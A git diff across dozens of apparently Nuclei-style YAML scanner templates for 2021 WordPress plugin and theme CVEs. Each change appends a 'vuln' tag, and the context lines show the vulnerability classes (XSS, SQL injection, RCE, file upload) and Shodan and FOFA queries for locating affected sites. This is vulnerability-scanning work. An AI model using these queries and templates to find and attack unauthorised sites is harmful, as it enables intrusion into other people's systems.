cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24170.yaml b/http/cves/2021/CVE-2021-24170.yaml index 385e2b7ab86..39cd04096b6 100644 --- a/http/cves/2021/CVE-2021-24170.yaml +++ b/http/cves/2021/CVE-2021-24170.yaml @@ -24,7 +24,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/metronet-profile-picture" publicwww-query: "/wp-content/plugins/metronet-profile-picture" - tags: cve,cve2021,wp,wp-plugin,wpscan,wordpress,info-leak,authenticated,metronet-profile-picture,vkev + tags: cve,cve2021,wp,wp-plugin,wpscan,wordpress,info-leak,authenticated,metronet-profile-picture,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2021/CVE-2021-24175.yaml b/http/cves/2021/CVE-2021-24175.yaml index 4724d29a8d6..60bdfb8ecb7 100644 --- a/http/cves/2021/CVE-2021-24175.yaml +++ b/http/cves/2021/CVE-2021-24175.yaml @@ -25,7 +25,7 @@ info: vendor: posimyth product: the_plus_addons_for_elementor framework: wordpress - tags: cve,cve2021,wordpress,wp-theme,wpscan,elementor,plus-addons,passive,vkev + tags: cve,cve2021,wordpress,wp-theme,wpscan,elementor,plus-addons,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index af2ced5fd9f..f6fe0e835da 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -28,7 +28,7 @@ info: vendor: jh_404_logger_project product: jh_404_logger framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,xss,wpscan,jh_404_logger_project + tags: cve2021,cve,wordpress,wp-plugin,xss,wpscan,jh_404_logger_project,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index 30b533d0a2a..d0f15c0d822 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -29,7 +29,7 @@ info: vendor: kiboit product: phastpress framework: wordpress - tags: cve2021,cve,redirect,wpscan,wordpress,kiboit + tags: cve2021,cve,redirect,wpscan,wordpress,kiboit,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index ce68b379a7c..04eb4b33092 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -29,7 +29,7 @@ info: vendor: daggerhartlab product: "openid_connect_generic_client" framework: wordpress - tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab + tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index 7266e1a8726..40034202c36 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/controlled-admin-access/ fofa-query: body=/wp-content/plugins/controlled-admin-access/ publicwww-query: /wp-content/plugins/controlled-admin-access/ - tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby + tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24219.yaml b/http/cves/2021/CVE-2021-24219.yaml index 34c94a08281..f450bb0837b 100644 --- a/http/cves/2021/CVE-2021-24219.yaml +++ b/http/cves/2021/CVE-2021-24219.yaml @@ -23,7 +23,7 @@ info: vendor: thrivethemes product: focusblog framework: wordpress - tags: cve,cve2021,wpscan,wordpress,wp,wp-plugin,thrivethemes,intrusive,vkev + tags: cve,cve2021,wpscan,wordpress,wp,wp-plugin,thrivethemes,intrusive,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index 9ac5c3498c2..27b65fbeae6 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -27,7 +27,7 @@ info: vendor: accessally product: accessally framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,wpscan,accessally + tags: cve2021,cve,wordpress,wp-plugin,wpscan,accessally,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 583149429f7..120a5a8a711 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -28,7 +28,7 @@ info: vendor: patreon product: patreon_wordpress framework: wordpress - tags: cve,cve2021,wordpress,patreon-connect,unauth,lfi,patreon,wp,wpscan,vkev + tags: cve,cve2021,wordpress,patreon-connect,unauth,lfi,patreon,wp,wpscan,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index d46e24fd30c..39ce3776955 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -28,7 +28,7 @@ info: vendor: boostifythemes product: goto framework: wordpress - tags: cve2021,cve,xss,wp-theme,wpscan,wordpress,boostifythemes + tags: cve2021,cve,xss,wp-theme,wpscan,wordpress,boostifythemes,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index 75f37a25f26..103ef1d98b1 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -28,7 +28,7 @@ info: vendor: imagements_project product: imagements framework: wordpress - tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project + tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project,vuln variables: php: "{{to_lower('{{randstr}}')}}.php" diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index dcdb82d5258..c4a2a4f508c 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -28,7 +28,7 @@ info: vendor: purethemes product: findeo framework: wordpress - tags: cve2021,cve,realteo,xss,wordpress,plugin,wpscan,intrusive,purethemes + tags: cve2021,cve,realteo,xss,wordpress,plugin,wpscan,intrusive,purethemes,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index cc88a788225..292eec8d4cd 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -27,7 +27,7 @@ info: vendor: genetechsolutions product: "pie_register" framework: wordpress - tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress + tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index 049571644f2..d9f77abd744 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -28,7 +28,7 @@ info: vendor: trumani product: "stop_spammers" framework: wordpress - tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani + tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index f57565e5e3c..b1acae6393d 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -28,7 +28,7 @@ info: vendor: supsystic product: ultimate_maps framework: wordpress - tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic,xss + tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index 1e13990c04c..6c4d20db081 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/popup-by-supsystic fofa-query: body=/wp-content/plugins/popup-by-supsystic publicwww-query: /wp-content/plugins/popup-by-supsystic - tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic + tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 108ac9d1137..e2eb0ec5201 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ fofa-query: body=/wp-content/plugins/contact-form-plugin/ publicwww-query: /wp-content/plugins/contact-form-plugin/ - tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic + tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index 50ff6841732..303fe8614de 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -28,7 +28,7 @@ info: vendor: querysol product: redirection_for_contact_form_7 framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,wpscan,querysol,vkev + tags: cve2021,cve,wordpress,wp-plugin,wpscan,querysol,vkev,vuln http: - method: POST diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index c9e56de6ccf..5e976ca6ca5 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -30,7 +30,7 @@ info: vendor: kaswara_project product: kaswara framework: wordpress - tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project,vkev + tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project,vkev,vuln variables: zip_file: "{{to_lower(rand_text_alpha(6))}}" php_file: "{{to_lower(rand_text_alpha(2))}}.php" diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index 34110a62846..386a15d02c4 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -28,7 +28,7 @@ info: vendor: cars-seller-auto-classifieds-script_project product: cars-seller-auto-classifieds-script framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,sqli,wpscan,cars-seller-auto-classifieds-script_project,vkev + tags: cve2021,cve,wordpress,wp-plugin,sqli,wpscan,cars-seller-auto-classifieds-script_project,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index 6e71cab5712..c857401f74c 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -27,7 +27,7 @@ info: vendor: mooveagency product: redirect_404_to_parent framework: wordpress - tags: cve2021,cve,xss,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency + tags: cve2021,cve,xss,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index aef7221e89b..979f6626ebd 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -29,7 +29,7 @@ info: vendor: mooveagency product: select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons framework: wordpress - tags: cve2021,cve,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,xss,wp-plugin,wordpress,edb,mooveagency + tags: cve2021,cve,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,xss,wp-plugin,wordpress,edb,mooveagency,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index d5b560c35ce..0cf5b3c3805 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -27,7 +27,7 @@ info: vendor: acymailing product: acymailing framework: wordpress - tags: cve,cve2021,wpscan,wordpress,redirect,wp-plugin,acymailing + tags: cve,cve2021,wpscan,wordpress,redirect,wp-plugin,acymailing,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 85ed46a341c..58596624d5c 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/photo-gallery fofa-query: body=/wp-content/plugins/photo-gallery publicwww-query: /wp-content/plugins/photo-gallery - tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web + tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24295.yaml b/http/cves/2021/CVE-2021-24295.yaml index 4d1570fcb79..c6b5fd0c497 100644 --- a/http/cves/2021/CVE-2021-24295.yaml +++ b/http/cves/2021/CVE-2021-24295.yaml @@ -25,7 +25,7 @@ info: product: spam_protection\,_antispam\,_firewall framework: wordpress fofa-query: body="/plugin/cleantalk-spam-protect/" - tags: cve,cve2024,wpscan,wordpress,wp,wp-plugin,cleantalk-spam-protect,sqli,passive,vkev + tags: cve,cve2024,wpscan,wordpress,wp,wp-plugin,cleantalk-spam-protect,sqli,passive,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index f54e3799b9c..e24bc29da2c 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -29,7 +29,7 @@ info: vendor: ibenic product: "simple_giveaways" framework: wordpress - tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic + tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index f03bbd52eb0..3134ec13e5d 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -27,7 +27,7 @@ info: vendor: pickplugins product: product_slider_for_woocommerce framework: wordpress - tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins + tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 696f96c0c60..f0b2e545b04 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -28,7 +28,7 @@ info: vendor: wowthemes product: mediumish framework: wordpress - tags: cve2021,cve,mediumish,xss,wordpress,wpscan,intrusive,wowthemes + tags: cve2021,cve,mediumish,xss,wordpress,wpscan,intrusive,wowthemes,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 96f8536b38c..347df9df5c7 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -28,7 +28,7 @@ info: vendor: "bold-themes" product: bello framework: wordpress - tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes + tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index c93730066aa..9cb5a0b94d3 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -28,7 +28,7 @@ info: vendor: smartdatasoft product: "car_repair_services_\\&_auto_mechanic" framework: wordpress - tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft + tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index f2ddd138ba7..c7bd01e8653 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -30,7 +30,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: /wp-content/plugins/wp-statistics/ google-query: inurl:/wp-content/plugins/wp-statistics - tags: time-based-sqli,cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs + tags: time-based-sqli,cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 7e547edc1a7..8a71fa0adae 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -27,7 +27,7 @@ info: vendor: jnews product: jnews framework: wordpress - tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews + tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index dcf1a872abc..a35370c5975 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -29,7 +29,7 @@ info: vendor: smartypantsplugins product: sp_project_\&_document_manager framework: wordpress - tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins + tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index 1ad0de492da..986ab09e422 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -29,7 +29,7 @@ info: vendor: posimyth product: the_plus_addons_for_elementor framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,posimyth + tags: cve2021,cve,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,posimyth,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index ff9188c9318..d00df025bf8 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -27,7 +27,7 @@ info: vendor: posimyth product: the_plus_addons_for_elementor framework: wordpress - tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,elementor,posimyth + tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,elementor,posimyth,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 6ac56d9c19a..3d6e044a5fd 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -28,7 +28,7 @@ info: vendor: tielabs product: jannah framework: wordpress - tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs + tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index ab0848977ab..d495970c2a7 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -30,7 +30,7 @@ info: product: fancy_product_designer framework: wordpress google-query: inurl:“/wp-content/plugins/fancy-product-designer” - tags: cve2021,cve,wordpress,wp,seclists,wpscan,rce,wp-plugin,fancyproduct,radykal,vkev + tags: cve2021,cve,wordpress,wp,seclists,wpscan,rce,wp-plugin,fancyproduct,radykal,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index 6ab8917eccc..9f33a7f2e02 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -29,7 +29,7 @@ info: vendor: contempothemes product: real_estate_7 framework: wordpress - tags: cve,cve2021,xss,wordpress,wpscan,contempothemes + tags: cve,cve2021,xss,wordpress,wpscan,contempothemes,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index 966d16383b8..3ad51f0b7ef 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -27,7 +27,7 @@ info: vendor: chimpgroup product: foodbakery framework: wordpress - tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,chimpgroup + tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,chimpgroup,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index a94b4b2405b..680796d37e8 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -27,7 +27,7 @@ info: vendor: gvectors product: wpforo_forum framework: wordpress - tags: cve2021,cve,wpscan,wordpress,redirect,gvectors + tags: cve2021,cve,wpscan,wordpress,redirect,gvectors,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index a3c50e1e220..cc7b7ed81b0 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -27,7 +27,7 @@ info: vendor: tielabs product: jannah framework: wordpress - tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs + tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index 3e792c97e06..cc787afb18d 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/prismatic fofa-query: body=/wp-content/plugins/prismatic publicwww-query: "/wp-content/plugins/prismatic" - tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet + tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index fae40d018e6..7bbc109c856 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -29,7 +29,7 @@ info: vendor: gambit product: titan_framework framework: wordpress - tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit + tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index 421b1594f2f..e99653a67cd 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -29,7 +29,7 @@ info: vendor: boldgrid product: w3_total_cache framework: wordpress - tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated,boldgrid + tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated,boldgrid,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index e6252adff79..bb6770f70c5 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/polls-widget/ fofa-query: body=/wp-content/plugins/polls-widget/ publicwww-query: "/wp-content/plugins/polls-widget/" - tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart,vkev + tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index 86c7b0be932..a6a50122a01 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -27,7 +27,7 @@ info: vendor: boldgrid product: w3_total_cache framework: wordpress - tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid + tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index ee84663897c..f63c299c3a9 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.html:/wp-content/plugins/qt-kentharadio fofa-query: body=/wp-content/plugins/qt-kentharadio publicwww-query: "/wp-content/plugins/qt-kentharadio" - tags: cve2021,cve,wordpress,lfi,ssrf,wp,wp-plugin,wpscan,qantumthemes + tags: cve2021,cve,wordpress,lfi,ssrf,wp,wp-plugin,wpscan,qantumthemes,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 27a9aab5053..051d31c5865 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -27,7 +27,7 @@ info: vendor: pickplugins product: post_grid framework: wordpress - tags: cve2021,cve,authenticated,wpscan,xss,wp,wordpress,wp-plugin,pickplugins + tags: cve2021,cve,authenticated,wpscan,xss,wp,wordpress,wp-plugin,pickplugins,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index ead7af8c9d6..b88fd2b5cd1 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -28,7 +28,7 @@ info: vendor: marmoset product: marmoset_viewer framework: wordpress - tags: cve2021,cve,xss,wpscan,wp-plugin,wordpress,intrusive,marmoset + tags: cve2021,cve,xss,wpscan,wp-plugin,wordpress,intrusive,marmoset,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 4c83e516f8b..02c357d0bae 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -27,7 +27,7 @@ info: vendor: dwbooster product: calendar_event_multi_view framework: wordpress - tags: cve2021,cve,xss,wordpress,wp-plugin,wpscan,dwbooster,vkev + tags: cve2021,cve,xss,wordpress,wp-plugin,wpscan,dwbooster,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index b6aa9069d8d..d43da1027da 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml @@ -28,7 +28,7 @@ info: vendor: amentotech product: workreap framework: wordpress - tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech,vkev + tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech,vkev,vuln variables: string: "CVE-2021-24499" diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index b5efc2bfd97..572b7f7e280 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: mf_gig_calendar_project product: mf_gig_calendar - tags: cve2021,cve,wp-plugin,authenticated,wpscan,wordpress,mf_gig_calendar_project + tags: cve2021,cve,wp-plugin,authenticated,wpscan,wordpress,mf_gig_calendar_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-24522.yaml b/http/cves/2021/CVE-2021-24522.yaml index 4d2c5015c32..25405916459 100644 --- a/http/cves/2021/CVE-2021-24522.yaml +++ b/http/cves/2021/CVE-2021-24522.yaml @@ -22,7 +22,7 @@ info: metadata: max-request: 2 fofa-query: body="wp-content/plugins/wp-user-avatar" - tags: cve,cve2021,wordpress,wp,wp-plugin,wp-user-avatar,profilepress,xss + tags: cve,cve2021,wordpress,wp,wp-plugin,wp-user-avatar,profilepress,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24527.yaml b/http/cves/2021/CVE-2021-24527.yaml index 